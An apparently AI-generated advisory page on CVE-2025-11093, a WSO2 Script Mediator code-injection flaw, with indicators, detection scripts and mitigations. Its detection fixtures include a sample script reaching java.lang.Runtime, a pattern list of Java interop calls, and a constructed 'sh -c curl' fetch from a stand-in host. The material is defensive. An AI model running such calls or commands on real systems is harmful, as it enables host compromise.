CVE-2025-11093 Overview
CVE-2025-11093 is an arbitrary code execution vulnerability affecting multiple WSO2 products. The flaw stems from insufficient restrictions on the GraalJS and NashornJS engines that back the Script Mediator in the integration runtime. Authenticated users holding elevated privileges can execute arbitrary code within the runtime environment.
In WSO2 Micro Integrator and WSO2 Enterprise Integrator, access to these scripting engines is restricted to administrators by default. In WSO2 API Manager, the access extends to both administrators and API creators. A privileged user who turns malicious, or whose credentials are stolen, can abuse this access to perform unauthorized actions or fully compromise the execution environment. The weakness is classified as CWE-94 (Improper Control of Generation of Code, 'Code Injection').
Critical Impact
Authenticated privileged users can execute arbitrary code within the WSO2 integration runtime, compromising confidentiality, integrity, and availability of the host process.
Affected Products
- WSO2 API Manager and WSO2 API Control Plane
- WSO2 Micro Integrator and WSO2 Enterprise Integrator
- WSO2 Traffic Manager and WSO2 Universal Gateway
Discovery Timeline
- 2025-11-05 - CVE-2025-11093 published to NVD
- 2026-01-09 - Last updated in NVD database
Technical Details for CVE-2025-11093
Vulnerability Analysis
The Script Mediator in WSO2 integration products allows developers to embed JavaScript logic inside mediation flows. The mediator delegates execution to either the GraalJS or NashornJS engine. Both engines run in a context that does not sufficiently restrict access to host Java classes and runtime APIs.
When a privileged user deploys or edits a mediation sequence containing a Script Mediator block, the embedded script executes inside the WSO2 Java Virtual Machine (JVM) with the privileges of the WSO2 service account. Because the engines lack a strict sandbox, attackers can reach java.lang.Runtime, java.lang.ProcessBuilder, and reflective APIs to execute operating system commands, read or modify files, and pivot inside the network.
The issue applies to authenticated sessions only, but the privilege barrier is low in API Manager deployments where API creators routinely author mediation logic. The result is a full breach of the integration runtime boundary from a legitimate user role.
Root Cause
The root cause is missing isolation between the script execution context and the host JVM. The Script Mediator does not enforce a deny-list or sandbox policy on Java interop calls, allowing scripts to instantiate arbitrary classes and invoke arbitrary methods.
Attack Vector
The attack vector is network-based. An attacker authenticates to the WSO2 management or publisher interface with an administrator or API creator role, then submits a mediation sequence containing JavaScript that invokes host-level Java APIs. Deployment of the sequence triggers code execution under the WSO2 process identity.
No verified public exploit code is available at the time of writing. Refer to the WSO2 Security Advisory WSO2-2025-4510 for vendor-confirmed technical details.
Detection Methods for CVE-2025-11093
Indicators of Compromise
- Unexpected child processes spawned by the WSO2 Carbon or Micro Integrator JVM, such as sh, bash, cmd.exe, or powershell.exe.
- New or modified Script Mediator entries in mediation sequences, registry resources, or Carbon Application (CApp) archives.
- Outbound network connections from the WSO2 host to unfamiliar destinations following a publisher or admin login event.
- Audit log entries showing API creators or administrators publishing mediation artifacts containing script mediators referencing java.lang.* classes.
Detection Strategies
- Inspect deployed synapse configurations for <script language="js"> or <script language="nashornJs"> blocks that import or reference Java classes. A Script Mediator can also load its body from the registry through the key attribute, so review the referenced registry resources as well, not only inline script bodies.
- Correlate WSO2 publisher activity with process creation events on the host operating system to identify scripts that escape the JVM boundary; a shell whose direct parent is the WSO2 java process is the primary signal.
- Alert on Java interop and process-spawning strings (Java.type, Runtime.getRuntime, ProcessBuilder, Class.forName) appearing in mediation source.
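The following Python script is an added example (not code from this page or from WSO2) of the first and third detection strategies above: it parses a Synapse sequence, walks every <script> mediator in the Synapse namespace, flags inline bodies that reference Java interop or process-spawning APIs, and separately flags scripts whose body lives in the registry and so cannot be inspected from the sequence alone. The sample sequence and the pattern list are constructed for the example; the pattern list is an assumption to be extended for your environment.

```python
"""Scan Synapse sequence XML for Script Mediator blocks that reach host Java APIs."""
import re
import xml.etree.ElementTree as ET

SYNAPSE_NS = "http://ws.apache.org/ns/synapse"

# Strings that indicate the script is reaching the host JVM rather than only the
# message context. Java.type() is the Nashorn/GraalJS interop entry point,
# Packages.* is the Nashorn-style alternative, and the remaining entries are the
# host classes the indicators above call out. Assumed list; extend as needed.
SUSPICIOUS_PATTERNS = [
    r"Java\.type\s*\(",
    r"Packages\.java",
    r"java\.lang\.Runtime",
    r"Runtime\.getRuntime",
    r"ProcessBuilder",
    r"Class\.forName",
    r"java\.lang\.reflect",
]
_PATTERN_RE = re.compile("|".join(SUSPICIOUS_PATTERNS))

# Constructed sample: one benign payload transformation, one script that reaches
# java.lang.Runtime, and one whose body lives in the registry (conf:/ key).
SAMPLE_SEQUENCE = """<sequence xmlns="http://ws.apache.org/ns/synapse" name="orderEnrich">
  <script language="js"><![CDATA[
    var payload = mc.getPayloadJSON();
    payload.processed = true;
    mc.setPayloadJSON(payload);
  ]]></script>
  <script language="nashornJs"><![CDATA[
    var Runtime = Java.type('java.lang.Runtime');
    var rt = Runtime.getRuntime();
  ]]></script>
  <script language="js" key="conf:/scripts/enrich.js" function="enrich"/>
  <log level="full"/>
</sequence>"""


def scan_sequence(xml_text):
    """Return one finding per <script> mediator that needs review.

    A finding is raised when an inline body matches a suspicious pattern, or when
    the body is loaded from the registry via the key attribute and therefore
    cannot be inspected from the sequence alone.
    """
    root = ET.fromstring(xml_text)
    findings = []
    for script in root.iter(f"{{{SYNAPSE_NS}}}script"):
        language = script.get("language", "")
        key = script.get("key")
        body = script.text or ""  # CDATA content is returned as plain text
        hits = sorted(set(_PATTERN_RE.findall(body)))
        if hits:
            findings.append({"language": language, "key": key, "hits": hits,
                             "reason": "java interop reference in inline script"})
        elif key and not body.strip():
            findings.append({"language": language, "key": key, "hits": [],
                             "reason": "script body in registry; inspect resource"})
    return findings


if __name__ == "__main__":
    for finding in scan_sequence(SAMPLE_SEQUENCE):
        print(finding)
```

Run it against the XML exported from each deployed Carbon Application or the synapse-configs directory; the registry-backed finding is deliberately noisy, because a key that points at a registry resource is exactly where an attacker would hide the body from a sequence-level review.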
Monitoring Recommendations
- Forward WSO2 access, audit, and wso2carbon.log events to a centralized logging platform for retention and correlation.
- Monitor the WSO2 service account for shell invocations, file writes outside the product directory, and unexpected outbound connections.
- Review role membership in API Manager publisher and admin portals on a recurring basis and remove unused privileged accounts.
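The detection strategy of correlating publisher activity with host process creation, and the monitoring recommendation to watch the WSO2 service account for shell invocations, can be implemented as a small correlation rule. The Python below is an added example, not code from this page or from WSO2. The event schema is a constructed, normalized form (field names are assumptions, not a native WSO2, auditd or Sysmon format); the WSO2 JVM is recognised by the -Dcarbon.home system property that the product startup scripts place on the java command line, and the timestamps, users and paths are constructed.

```python
"""Flag shells spawned by the WSO2 JVM and tie them to recent publisher/admin logins."""
from datetime import datetime, timedelta

SHELLS = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe", "pwsh"}

# Constructed process-creation events (normalized schema, field names assumed).
PROCESS_EVENTS = [
    {"ts": "2025-11-20T09:30:00", "pid": 4102, "comm": "sh", "user": "root",
     "parent_comm": "cron", "parent_cmdline": "/usr/sbin/cron -f"},
    {"ts": "2025-11-20T10:02:15", "pid": 5311, "comm": "sh", "user": "wso2",
     "parent_comm": "java",
     "parent_cmdline": "java -Dcarbon.home=/opt/wso2am org.wso2.carbon.bootstrap.Bootstrap"},
    {"ts": "2025-11-20T10:02:16", "pid": 5312, "comm": "curl", "user": "wso2",
     "parent_comm": "sh", "parent_cmdline": "sh -c curl http://203.0.113.7/x"},
    {"ts": "2025-11-20T10:05:00", "pid": 5400, "comm": "bash", "user": "app",
     "parent_comm": "java", "parent_cmdline": "java -jar /opt/other/app.jar"},
]

# Constructed WSO2 publisher/admin portal login events.
LOGIN_EVENTS = [
    {"ts": "2025-11-20T09:58:40", "user": "alice", "portal": "publisher"},
    {"ts": "2025-11-20T07:10:00", "user": "bob", "portal": "admin"},
]


def is_wso2_jvm(cmdline):
    """True when a java command line carries the carbon.home property set by WSO2 startup scripts."""
    return "-Dcarbon.home=" in cmdline


def find_jvm_shell_spawns(process_events, login_events, window_minutes=30):
    """Return alerts for shells whose direct parent is a WSO2 JVM.

    Each alert lists the portal logins seen within window_minutes before the
    spawn, which is the correlation an analyst needs to attribute the script
    deployment to an account. Grandchildren (the curl under sh above) are left
    to the process tree of the flagged shell.
    """
    window = timedelta(minutes=window_minutes)
    alerts = []
    for ev in process_events:
        if ev["comm"] not in SHELLS or ev["parent_comm"] != "java":
            continue
        if not is_wso2_jvm(ev["parent_cmdline"]):
            continue
        spawn_at = datetime.fromisoformat(ev["ts"])
        recent = sorted({
            login["user"] for login in login_events
            if spawn_at - window <= datetime.fromisoformat(login["ts"]) <= spawn_at
        })
        alerts.append({"pid": ev["pid"], "shell": ev["comm"], "ts": ev["ts"],
                       "service_user": ev["user"], "recent_logins": recent})
    return alerts


if __name__ == "__main__":
    for alert in find_jvm_shell_spawns(PROCESS_EVENTS, LOGIN_EVENTS):
        print(alert)
```

A shell under the WSO2 JVM is rare enough in production that the rule can alert on every hit; the login correlation narrows the follow-up to the accounts that could have deployed a Script Mediator in the preceding window.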
How to Mitigate CVE-2025-11093
Immediate Actions Required
- Apply the WUM updates and product fixes referenced in WSO2 Security Advisory WSO2-2025-4510 for all affected deployments.
- Audit all administrator and API creator accounts and revoke access from users who do not require mediation authoring capabilities.
- Review existing mediation sequences and Carbon Applications for unauthorized Script Mediator additions.
Patch Information
WSO2 has published remediation guidance in security advisory WSO2-2025-4510 covering API Manager, API Control Plane, Micro Integrator, Enterprise Integrator, Traffic Manager, and Universal Gateway. Consult the advisory for product-specific WUM levels and update instructions.
Workarounds
- Disable the Script Mediator entirely if no mediation flow requires JavaScript, following the vendor advisory for the product-specific way to remove the mediator registration; afterwards, confirm that a test sequence containing a <script> element is rejected at deployment.
- Restrict the Internal/creator and administrator roles in API Manager so only a small, audited set of identities can publish mediation logic.
- Place the WSO2 management interfaces behind a network policy that only allows access from administrative jump hosts.
# Example: restrict access to the WSO2 management console (default HTTPS port 9443) with iptables.
# Rule order matters: the ACCEPT for the jump-host subnet must precede the DROP, and
# 10.0.10.0/24 is a placeholder for your administrative network.
iptables -A INPUT -p tcp --dport 9443 -s 10.0.10.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 9443 -j DROP
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.


